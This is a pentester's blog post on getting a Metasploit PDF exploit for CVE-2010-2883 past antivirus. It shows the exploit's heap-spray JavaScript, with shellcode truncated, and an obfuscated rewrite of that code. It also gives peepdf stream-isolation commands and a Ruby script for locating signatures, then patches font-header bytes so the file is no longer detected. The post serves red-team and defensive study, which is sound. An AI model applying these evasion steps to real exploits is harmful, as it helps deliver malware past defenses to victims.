Bypassing antivirus detection on a PDF exploit

Filter by category:

September 12, 2016 by Florent Poulain
Florent Poulain

Every pentester has one day grappled with an antivirus blocking his tools, be it for a pentest, a phishing campaign, a security awareness demonstration, and so on. Several Internet resources present usual techniques for bypassing AV signatures when working with executables, or at least when the detection affects the used payload, like a meterpreter. Then, one can resort to encoders, packers, or more manual solutions like modifying & recompiling the exploit code.

But what to do when the detection affects an exploit regarding a file format like PDF, and the active payload is not detected, rendering encoders useless ?

This article gives a few approaches for those kind of situations, and shows the importance of defense in depth when a malicious code is able to bypass all the gates and reaches the heart of the company.
 

Preparation

The exploit used here is generated by the metasploit module "adobecooltypesing", exploiting CVE-2010-2883 in an old version of a PDF reader, and of course detected by most antiviruses. Virustotal rating of the PDF before any tampering is : 36/53. Note: in the remaining of the article, only one antivirus will be used to assess the detection. Also, for readability, the payloads are much shortened (at the location of "[...]" strings).

We had in mind that, at one point of another, it would be required to perform a dichotomic search by overwriting pieces of the file, smaller and smaller until a precise localization of the signature. However, this technique, which is also known when working with executable files, presents a risk of failure because of the possible PDF compression, if applied to naively.

Indeed, PDF streams can be compressed (or even encrypted in the case of password protected PDFs), which is apparently the case of the PDF produced by metasploit. A quick "strings - pipe - grep" search for Javascript code patterns observed inside MSF's ruby module doesn't give any hits. Then, the problem, with the dichotomic algorithm considered, is that it is going to overwrite compressed bytes, which is likely to corrupt data and prevent their decompression in turn.

A good idea is then to uncompress the PDF's streams with pdftk and continue to work from there. The JS code becomes visible inside the new PDF:

$ strings msf_reverse_tcp.pdf | grep var
$ pdftk msf_reverse_tcp.pdf output msf_reverse_tcp_unc.pdf uncompress
$ strings msf_reverse_tcp_unc.pdf | grep var
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000[...]

Then, the file can be analyzed further. A PDF usually contains a structure with several "objects", "streams", etc. It should be predictable that the exploit lays inside one of these, and it would be interesting to know which one exactly, before proceeding with signature hunting. Several tools allow examining this structure and extracting or editing the contents. The Origami library is pretty well known, but another tool with a quicker learning curve, peepdf, will save our life for this task (github).
 

Identifying where are the signatures

Once the file open, peepdf gives a few interesting statistics. It also detects some payloads, potentially relevant to a malware analyst. Notably, an object that contains JavaScript code, id 13, and an object identified as linked to the vulnerability CVE-2010-2883, id 12. Not bad !

$ python peepdf/peepdf.py -i msfreversetcpunc.pdf
File: msfreversetcpunc.pdf
Size: 71568 bytes
Version: 1.5
Binary: True
Linearized: False
Encrypted: False
[...]
Version 0:
    Catalog: 1
    Info: No
    Objects (14): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
    Streams (4): [9, 12, 13, 14]
        Encoded (0): []
    Objects with JS code (1): [13]
    Suspicious elements:
        /AcroForm (1): [1]
        /OpenAction (1): [1]
        /XFA (1): [2]
        /JS (1): [4]
        /JavaScript (1): [4]
        CoolType.SING.uniqueName (CVE-2010-2883): [12]

 

Then, using the commands stream or object, the contents of the different elements of the PDF are printed out in the console.

Confirmation is made that the relevant data is probably in streams 12 and 13. Indeed, the 12th stream contains a load of binary data, which turn out to be a TTF font when searching visible headers on the net. It also matches what can be seen inside the source code of the metasploit module, or the information available about CVE-2010-2883.

PPDF> stream 12
00 01 00 00 00 11 01 00 00 04 00 10 4f 53 2f 32   |............OS/2|
b4 5f f4 63 00 00 eb 70 00 00 00 56 50 43 4c 54   |._.c...p...VPCLT|
d1 8a 5e 97 00 00 eb c8 00 00 00 36 63 6d 61 70   |..^........6cmap|
[...]
09 c6 8e b2 00 00 b4 c4 00 00 04 30 6b 65 a2 6e   |...........0ke.n|
dc 52 d5 99 00 00 bd a0 00 00 2d 8a 6c 6f 63 61   |.R........-.loca|
f3 cb d2 3d 00 00 bb 84 00 00 02 1a 6d 61 78 70   |...=........maxp|
05 47 06 3a 00 00 eb 2c 00 00 00 20 53 49 4e 47   |.G.:...,... SING|
d9 bc c8 b5 00 00 01 1c 00 00 1d df 70 6f 73 74   |............post|
b4 5a 2f bb 00 00 b8 f4 00 00 02 8e 70 72 65 70   |.Z/.........prep|
3b 07 f1 00 00 00 20 f8 00 00 05 68 00 00 01 00   |;..... ....h....|

And the stream 13 contains obviously the JavaScript code generated by the metasploit module:

PPDF> stream 13
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u[...]09eb%u7c1d%uae0c%u7e22%u7831%uf41b%ub872%u0718%u9dc9%u8209%ub131%u874a' );
var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf.length + 20 + 8 < 65536) NHsheKH[...]
uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH = SoVA.substring(0, 0x80000 - (0x1020-0x08) / 2);
var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO = new Array();
for (AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL=0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL<0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++) ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]=uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+"s";

Next, the idea is to isolate the contents of the streams one by one, by overwriting every one of them but one with a dummy string, before giving the results to the antivirus and checking how the detection changes.

The modify command of peepdf allows this substitution:

PPDF> modify
Usage: modify object|stream $object_id [$version] [$file]

Modifies the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).

For instance, substitution of the stream 12 with a "toto" string, and save to file:

PPDF> modify stream 12
Please, specify the stream content (if the content includes EOL characters use a file instead):
toto

Object modified successfully!!

PPDF> save stream12.pdf
File saved succesfully!!

Of course, the same process is repeated with all other possible suspect streams or objects. In this example, a set of 4 files will be generated, with respectively streams 9, 12, 13 and 14 isolated. The resulting files are scanned through the antivirus, and clearly things are becoming a little harder: the tests show that there are at least two different signatures, detecting both streams 12 and 13. However, no signature in any other object or stream.

detection

Analysis:

  • "stream12.pdf", that only contains the 12th stream, which is the TTF font, is detected as EXP/CVE-2010-2883. Hence, the crafted TTF font responsible for the original exploitation of the vulnerability is flagged as malicious.
  • "stream13.pdf", that only contains the 13th stream, which is the JavaScript code, is detected as EXP/Pidief.hdg. This looks like a more or less generic signature for malicious JS code.

Bypassing the JavaScript signature

The JavaScript code should be easier to modify than the TTF font, because the latest is a binary file format. After a few manual tests, an attempt of quick and easy bypass is made with an online JavasScript obfuscator.

The JS code from the PDF is copypasted on the website, and this one returns the following code, very different from the original one:

var _0x83f1=["\x75\x62\x38\x37\x32\x25\x75\x30\x37\x31\x38\x25\x75\x39 [...] \x64\x63\x39\x25\x75\x38\x32\x30\x39\x25\x75\x62\x31\x33\x31\x25\x75\x38\x37\x34\x61","\x25","\x75","\x30","\x63","\x25\x75","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73"];var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw=unescape;var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT=bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw(_0x83f1[0]);var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf=bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw(_0x83f1[1]+ _0x83f1[2]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[5]+ _0x83f1[3]+ _0x83f1[4]+ _0x83f1[3]+ _0x83f1[4]);while(NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf[_0x83f1[6]]+ 20+ 8< 65536){NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf+= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf};PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf[_0x83f1[7]](0,(0x0c0c- 0x24)/ 2);PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO+= gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT;PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO+= NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf;SoVA= PgHYGkknsdQowAocIEvcWOAzVulLCgIiUOYMWffyEitizelbeROAHKLaeJckkLMqlSTXiocEBWeNvZLMvaCO[_0x83f1[7]](0,65536/ 2);while(SoVA[_0x83f1[6]]< 0x80000){SoVA+= SoVA};uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH= SoVA[_0x83f1[7]](0,0x80000- (0x1020- 0x08)/ 2);var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO= new Array();for(AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL= 0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL< 0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++){ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]= uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+ _0x83f1[8]}

It remains to put this code inside the PDF thanks to peepdf's command modify stream 13 modified.js. N.B. if the new data has carriage returns, it is necessary to use an intermediary file like here, modified.js. Afterwards, the antivirus is ran on the new file. It is detected as EXP/CVE-2010-2883, which is known as the signature for the other stream containing the TTF font. To be sure, if the TTF stream is now replaced by a dummy string like "toto", no signature is triggered.

This means that the bypass of the JavaScript signature is successful. Nevertheless, the odds were pretty good of being able to modify enough the JS to render it undetectable, but clearly worse regarding the TTF font of the exploit which needs attention now.

 

Bypassing the CVE-2010-2883 signature

For the CVE detection bypass, it seemed convenient to come back to a good ol' dichotomy signature hunting.

The small script below was written for this purpose, probably not bug-free and quite naive, but covering the needs. It is used like this: ruby chunker.rb <file> <number of chunks> [start offset] [end offset]. If no offsets are specified, the whole file is processed by default. Next, the script divides the zone to process according to the number of chunks asked, and overwrites them one by one with "AAAAA" strings, before writing the result in new files which names indicate the overwrite offsets.

#! /usr/bin/env ruby

file = ARGV[0]
amount = ARGV[1].to_i
if ARGV.size > 2 then
  start = ARGV[2].to_i
  endp = ARGV[3].to_i
else
  start = 0
  endp = File.size?(file)
end

ext = File.extname(file)
Dir.mkdir("output") unless File.exists? "output"

c = 0
size = (endp - start) / amount

while c <= amount do
  i = start + c * size
  j = i + size

  outfile = "output/" + "chunk-#{i}-#{j}" + ext

  fd1 = File.open(file, "r+")
  fd2 = File.open(outfile, "w+")
  
  fd2.write(fd1.read(i))
  fd2.write("A" * size)
  fd1.seek(size, IO::SEEK_CUR)
  fd2.write(fd1.read())
  fd2.close
  fd1.close

  c += 1
end 

To determine the relevant offsets for the first pass, peepdf has a practical offsets command, allowing to list the starting and ending offsets of the various PDF objects:

PPDF> offsets
   [...]
     556
        Object  9 (114)
     669
     672
        Object  11 (126)
     797
     800
        Object  12 (66000)
   66799
   66802
        Object  4 (60)
   66861
   66864
        Object  13 (53)
   66916
   [...]
   67688
        Trailer (51)
   67738
   67739 EOF

Remember, the stream holding the "malicious" TTF font is number 12, hence between bytes 800 and 66799. As the processed PDF is uncompressed, it is possible to run the chunker.rb script directly on the file, between these offsets:

$ ruby chunker.rb msfrevtcp_jsOk.pdf 100 800 66799

 

In output, 100 new PDF files are generated, which names indicate between which offsets the data was overwritten:

$ ls output/
chunk-10026-10685.pdf  chunk-17275-17934.pdf  chunk-24524-25183.pdf  chunk-31773-32432.pdf  chunk-39022-39681.pdf  chunk-46271-46930.pdf  chunk-53520-54179.pdf  chunk-6072-6731.pdf    chunk-7390-8049.pdf
chunk-10685-11344.pdf  chunk-17934-18593.pdf  chunk-25183-25842.pdf  chunk-32432-33091.pdf  chunk-39681-40340.pdf  chunk-46930-47589.pdf  chunk-5413-6072.pdf    chunk-60769-61428.pdf  chunk-800-1459.pdf
chunk-11344-12003.pdf  chunk-18593-19252.pdf  chunk-25842-26501.pdf  chunk-33091-33750.pdf  chunk-40340-40999.pdf  chunk-4754-5413.pdf    chunk-54179-54838.pdf  chunk-61428-62087.pdf  chunk-8049-8708.pdf
chunk-12003-12662.pdf  chunk-19252-19911.pdf  chunk-26501-27160.pdf  chunk-33750-34409.pdf  chunk-4095-4754.pdf    chunk-47589-48248.pdf  chunk-54838-55497.pdf  chunk-62087-62746.pdf  chunk-8708-9367.pdf
chunk-12662-13321.pdf  chunk-19911-20570.pdf  chunk-27160-27819.pdf  chunk-3436-4095.pdf    chunk-40999-41658.pdf [...]

 

Next, the antivirus is ran over this file corpus, in cleaning mode, so there only remains in the folder the files that were not detected. That way, all the zones which overwrite allowed bypassing the AV detection can be obtained in one sight.

After this first script run, only one undetected file remains:

first

Conclusion, the signature lies between offsets 800 and 1459. It is then possible to run the script a second time between these new offsets, in order to identify more precisely the detected zone:

$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 1459

This time, the amount of positive detections lowers, and the remaining files allow downsizing the detected zone between the offsets 1016 to 1148.

seconde
 

Apparently, there is no discontinuity in the detection, hence with a little luck, only one signature for the whole zone. Therefore, modifying only a few bytes between the 1016th and 1048th byte could be enough to bypass the antivirus. The problem being this is now a binary file that needs patching, and modifications must not "break" the exploit in any way.

The relevant zone is examined in an hexadecimal editor:

hte

It looks like this is in the middle of the TTF file headers. Besides, the header announcing the "SING" table that allows exploitation of CVE-2010-2883 can be seen in the middle of the window. After a few checks, this zone could be a good news. By reading the metasploit module, it is visible that the data important for the exploitation is written at the offset 284 (0x11c) of the TTF file. cf line 124 of the adobe_cooltype_sing.rb module:

ttf_data[0x11c, sing.length] = sing

Yet here, the detection happens between 1016 - 800 = 216 and 1148 - 800 = 348 bytes.

Why this 800 bytes correction ? Peepdf has shown that the TTF file begins at offset 800 in the PDF file, while the offsets taken from the metasploit module are relative to the TTF file itself.

In short, it might be possible to manipulate bytes from the TTF file between bytes 216 and 284, which is both before the significant shellcode bytes but also inside the antivirus detection zone, thus without "damaging" the exploit or having to dive into the assembly in order to modify it.

And finally, the following was simpler than foreseen :-) By going back to a PDF that held the new obfuscated JavaScript in stream 12, and by making a new round with the chunker.rb script from the beginning of the flagged zone inside stream 13, which means from offset 1016, it happened by luck that one of the produced files was perfectly functionnal as exploit while being undetectable.

Actually, the first produced file, as soon as offset 1016, does its job like a charm ! Curiosity urges to check what the script did overwrite exactly:

diff
diff

4 non-ASCII bytes inside the TTF header were replaced by "A"s. We won't go any further in parsing the TTF header to know what are these bytes precisely, given that the goal is reached and that it is now possible to enjoy successful exploitation and code execution despite the workstation's antivirus.

 

Conclusion

It was possible to combine already known signature isolation techniques with tools able to perform a good parsing of the targeted file format, in order to achieve antivirus bypass. The general approach was:

  • Uncompressing of the document and parsing / extraction of the objects
  • Isolation of each object one by one, in order to identify all those responsible for AV detection
  • Obfuscation of detected readable data, like JavaScript code in this case
  • Dichotomic search for signatures inside binary data, and careful modification of the detected zones

This methodology can be extended to other file formats, given access to tools able to extract structures and data that make up those formats.

If antivirus remain useful to block most malicious codes, they are generally efficient only against already known codes. Moreover, we have just seen that it is relatively easy to make undetectable a file that was previously flagged, without altering its operation. Therefore, the defense in depth principle is necessary in order to limit the potential of damage by a malicious code making its way into the heart of internal networks. Moreover, the malicious presence detection capacities must not limit to virus detection, but should take into account suspicious behaviours in every parts of the Information System.